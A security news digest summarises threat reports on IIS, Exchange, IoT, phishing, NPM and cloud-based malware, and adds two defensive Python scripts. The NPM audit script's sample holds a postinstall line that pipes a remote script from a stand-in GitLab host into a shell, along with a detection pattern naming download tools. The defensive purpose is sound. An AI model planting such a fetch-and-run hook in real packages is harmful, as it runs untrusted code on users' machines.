[CyberLand News] Weekly #1 - Vulnerabilities and Malware
Latest news on vulnerabilities and malware in the cyber land
New Frebniis malware for Microsoft IIS
The Symantec Threat Hunter Team has discovered a new malware, named "Frebniis", that attackers are deploying on Microsoft Internet Information Services (IIS) servers. Frebniis abuses the IIS "Failed Request Event Buffering" (FREB) module so that it can monitor every HTTP POST request the server receives, and it executes attacker commands delivered through specially crafted web requests. Abusing FREB requires the attackers to have already compromised the IIS server; Symantec was unable to determine the initial access method used. Once in place, the malware injects a .NET backdoor into memory that supports proxying and C# code execution without ever writing to disk, which makes it hard to catch with file-based detection. Because the backdoor can proxy traffic through the compromised IIS server, it can potentially reach protected internal systems that are not exposed to the internet.
More details in Symantec report: Frebniis: New Malware Abuses Microsoft IIS Feature to Establish Backdoor
ProxyShellMiner vs MS Exchange
A new malware called "ProxyShellMiner" is exploiting the ProxyShell vulnerabilities in Exchange Server (CVE-2021-34473 and CVE-2021-34523), which Microsoft patched in 2021.
Once the vulnerabilities are exploited, the attackers can gain complete control of the Exchange server and use it to pivot to other parts of the organization's network.
The malware drops a .NET payload into the NETLOGON share of the domain controller, which domain-joined machines read at logon, so that the payload reaches every device on the network. The payload only activates when started with a command-line parameter that acts as a password for its XMRig miner component; once active, the attackers use it to mine cryptocurrency for profit.
The malware uses several techniques to evade security tools, including creating a firewall rule that blocks all outgoing traffic in order to hinder detection by defenders. The Morphisec article warns that the impact goes beyond service outages and degraded server performance: the same foothold lets the attackers do anything from deploying backdoors to executing arbitrary code. The best protection against ProxyShellMiner infections is to apply the available security updates and to use comprehensive, multi-layered threat detection and defense.
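Two of the artefacts described above, the block-all-outbound firewall rule and the payload planted in the NETLOGON share, lend themselves to a simple hunt. The following Python script is an added example written for this digest, not code from the Morphisec report: it parses the text that `netsh advfirewall firewall show rule name=all` prints (the sample below is constructed, and the rule names in it are arbitrary) to flag enabled rules that block every outbound connection, and it lists recently modified executables in a directory such as a NETLOGON share. The file-type list, the seven-day threshold and the sample entries are assumptions.

```python
import os
import time
from typing import Dict, Iterable, List, Optional, Tuple

# Constructed sample of `netsh advfirewall firewall show rule name=all` output.
# Rule names are arbitrary (assumption); one rule allows DNS, the other blocks
# all outbound traffic the way the ProxyShellMiner write-up describes.
SAMPLE_NETSH_OUTPUT = """
Rule Name:                            Core Networking - DNS (UDP-Out)
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            Out
Profiles:                             Domain,Private,Public
Grouping:                             Core Networking
LocalIP:                              Any
RemoteIP:                             Any
Protocol:                             UDP
LocalPort:                            Any
RemotePort:                           53
Edge traversal:                       No
Action:                               Allow

Rule Name:                            System Health Service
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            Out
Profiles:                             Domain,Private,Public
Grouping:
LocalIP:                              Any
RemoteIP:                             Any
Protocol:                             Any
Edge traversal:                       No
Action:                               Block
"""


def parse_netsh_rules(text: str) -> List[Dict[str, str]]:
    """Turn the 'Key:  value' blocks that netsh prints into one dict per rule."""
    rules: List[Dict[str, str]] = []
    current: Dict[str, str] = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("-"):
            continue  # blank separators and the dashed underline
        key, sep, value = line.partition(":")
        if not sep:
            continue
        key, value = key.strip(), value.strip()
        if key == "Rule Name":  # every rule block starts with its name
            current = {}
            rules.append(current)
        current[key] = value
    return rules


def block_all_outbound_rules(rules: Iterable[Dict[str, str]]) -> List[str]:
    """Names of enabled rules that block every outbound connection: any host, any protocol."""
    return [
        r.get("Rule Name", "")
        for r in rules
        if r.get("Enabled") == "Yes"
        and r.get("Direction") == "Out"
        and r.get("Action") == "Block"
        and r.get("RemoteIP") == "Any"
        and r.get("Protocol") == "Any"
    ]


# File types worth triaging in a logon-script share (assumption: extend as needed).
EXECUTABLE_SUFFIXES = (".exe", ".dll", ".ps1", ".vbs", ".bat", ".cmd")


def flag_recent_executables(entries: Iterable[Tuple[str, float]], now: Optional[float] = None,
                            max_age_days: float = 7) -> List[str]:
    """Given (path, mtime) pairs, return executables modified within max_age_days.

    Legitimate logon scripts live in NETLOGON too, so treat the result as a triage
    list to compare against a known baseline, not as a verdict.
    """
    now = time.time() if now is None else now
    cutoff = now - max_age_days * 86400
    return sorted(p for p, m in entries if p.lower().endswith(EXECUTABLE_SUFFIXES) and m >= cutoff)


def walk_share(share_path: str) -> Iterable[Tuple[str, float]]:
    """Yield (path, mtime) for every file under a share such as \\\\dc01\\NETLOGON."""
    for root, _dirs, files in os.walk(share_path):
        for name in files:
            path = os.path.join(root, name)
            yield path, os.path.getmtime(path)


if __name__ == "__main__":
    for name in block_all_outbound_rules(parse_netsh_rules(SAMPLE_NETSH_OUTPUT)):
        print("block-all-outbound rule:", name)
    # On a real domain controller: flag_recent_executables(walk_share(r"\\dc01\NETLOGON"))
```

The firewall check deliberately ignores rule names, since the miner picks its own; it keys on the combination of Out, Block, any remote address and any protocol, which almost no legitimate rule uses. The NETLOGON scan is a triage list: compare it against a baseline of known logon scripts rather than alerting on every hit.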
More details in Morphisec report: DON’T SLEEP ON THE NEW PROXYSHELLMINER CAMPAIGN
New Mirai variant exploits IoT devices
A new variant of the notorious Mirai malware, named V3G4, has been discovered by researchers at Palo Alto Networks' Unit 42. Like the original Mirai botnet, it targets Internet of Things (IoT) devices and infects them by logging in with default credentials, and it additionally exploits several known vulnerabilities to propagate. V3G4 has been observed targeting exposed IP cameras to build a botnet that can be used to launch DDoS attacks, steal data, or install additional malware. Unit 42 observed the variant spreading from July to December 2022.
Details in Unit42 report: Mirai Variant V3G4 Targets IoT Devices
Screenshotter malware campaign
A recent report from Proofpoint's research team describes a malicious campaign, called "Screentime", that targets victims for financial gain. The campaign uses several malware components, including "Screenshotter", which takes screenshots of the victim's machine and sends them to the attackers, and the WasabiSeed installer, which downloads Screenshotter and other payloads while giving the attackers persistent access to the victim's device.
The attack begins with phishing emails sent to the target organization, with subject lines and messages designed to look corporate, such as a request to review a presentation. The emails contain a malicious URL that triggers the download of a JavaScript file. If the victim runs the JavaScript, it downloads WasabiSeed, followed by Screenshotter. The threat actors then review the victim's screenshots to decide whether the target looks lucrative before installing further payloads.
If a victim looks worthwhile, the actors deploy an AutoHotkey (AHK) bot that downloads a domain profiler and a data stealer from the Rhadamanthys malware family. Rhadamanthys can steal sensitive information such as stored credentials, web cookies, crypto wallets, FTP client data, Telegram and Steam accounts, and VPN configurations.
The researchers attribute the campaign to a threat actor tracked as TA886 and suggest it has Russian origins, as Russian-language strings are present in the code. The campaigns, ongoing since October 2022, primarily target organizations in the United States and Germany. While the attacks appear financially motivated, the researchers do not rule out cyber espionage. Proofpoint's post includes a detailed technical analysis of the campaign.
More details in Proofpoint report: Screentime: Sometimes It Feels Like Somebody's Watching Me
Check Point detects NPM malicious crypto-mining packages
Check Point has discovered a set of 16 packages on the NPM registry that pose as internet speed testers but are actually coinminers. All were uploaded by the same user, "trendava", and were found by Check Point on January 17, 2023.
Following the company's report, NPM removed them the next day. Although all the packages are named after internet speed testers, each is a cryptocurrency miner that hijacks the host's resources to mine cryptocurrency for the threat actor. Check Point's analysts found that the packages differ in code and technique: one downloads a helper from GitLab and uses it to connect to the mining pool, while another ships the malicious helper inside the package itself.
Developers can protect themselves from this kind of supply-chain attack by reviewing the code of any package they add to a project (including its install scripts), trusting only reputable sources and publishers, and checking package names carefully to avoid installing typosquatted packages.
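The review advice above can be partly automated. The following Python script is an added example for this digest, not code from the Check Point report. It audits a package.json for the traits the report describes: install-time lifecycle scripts, scripts that download and run remote content, and a package name within a couple of keystrokes of a legitimate one. The sample package.json is constructed; the name `speedtest-nett`, the GitLab-style URL and the list of known legitimate names are assumptions.

```python
import json
import re
from typing import Dict, List, Optional

# Lifecycle scripts npm runs automatically during `npm install`; a miner only
# needs one of these to start without any user action.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Rough markers of "fetch something from the network" inside a script line.
NETWORK_RE = re.compile(r"https?://|\bcurl\b|\bwget\b|Invoke-WebRequest", re.IGNORECASE)

# Constructed list of legitimate package names to compare against (assumption;
# a real audit would use the names the project actually depends on).
KNOWN_NAMES = ["speedtest-net", "fast-speedtest-api"]

# Constructed package.json in the style of the packages the report describes:
# a speed-tester name one keystroke from a real package, an install hook, and a
# postinstall step that pulls a helper from a GitLab-style URL (all assumptions).
SAMPLE_PACKAGE_JSON = """{
  "name": "speedtest-nett",
  "version": "1.0.3",
  "description": "Test your internet speed from the command line",
  "scripts": {
    "preinstall": "node helper.js",
    "postinstall": "curl -s https://gitlab.example/helper/-/raw/main/run.sh | sh",
    "test": "echo ok"
  },
  "dependencies": {}
}"""


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to spot names one or two keystrokes away from a real one."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_of(name: str, known: List[str], max_distance: int = 2) -> Optional[str]:
    """Return the known name this one impersonates, if any (an exact match is fine)."""
    for k in known:
        if name != k and levenshtein(name, k) <= max_distance:
            return k
    return None


def audit_package(package_json: str, known: List[str] = KNOWN_NAMES) -> Dict[str, object]:
    """Collect the red flags from a package.json document."""
    pkg = json.loads(package_json)
    scripts = pkg.get("scripts") or {}
    name = pkg.get("name", "")
    return {
        "name": name,
        "install_hooks": {k: v for k, v in scripts.items() if k in INSTALL_HOOKS},
        "network_in_scripts": {k: v for k, v in scripts.items() if NETWORK_RE.search(v)},
        "typosquat_of": typosquat_of(name, known),
    }


def is_suspicious(report: Dict[str, object]) -> bool:
    """Any single flag is enough to warrant a manual look before installing."""
    return bool(report["install_hooks"] or report["network_in_scripts"] or report["typosquat_of"])


if __name__ == "__main__":
    report = audit_package(SAMPLE_PACKAGE_JSON)
    print(json.dumps(report, indent=2))
    print("suspicious:", is_suspicious(report))
```

Run the audit over the package.json of each new dependency before adding it; an install hook that fetches and pipes remote content into a shell is exactly the pattern of the GitLab-helper variant described above, and a near-miss name against a package you meant to install is the typosquat case.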
More details in Check Point report: CloudGuard Spectral detects malicious crypto-mining packages on NPM – The leading registry for JavaScript Open-Source packages
Cloud infrastructure abuse for Cyber Attacks
SentinelLabs and QGroup GmbH are collaborating to track a threat campaign named WIP26, which has been targeting telecommunications providers in the Middle East. The WIP26 group uses public cloud infrastructure, including Microsoft 365 Mail, Microsoft Azure, Google Firebase, and Dropbox, to distribute malware, exfiltrate data, and carry out command and control (C2). The campaign begins with WhatsApp messages containing Dropbox links to a malware loader, which deploys backdoors called CMD365 and CMDEmber; these use Microsoft 365 Mail and Google Firebase instances as C2 servers. The backdoors execute attacker-supplied system commands through the Windows command interpreter. To evade detection, they masquerade as legitimate utility software such as PDF editors or browsers, using filenames, application icons, and digital signatures that mimic existing software vendors.
More details in SentinelLabs report: WIP26 Espionage | Threat Actors Abuse Cloud Infrastructure in Targeted Telco Attacks
A.I. support for text and images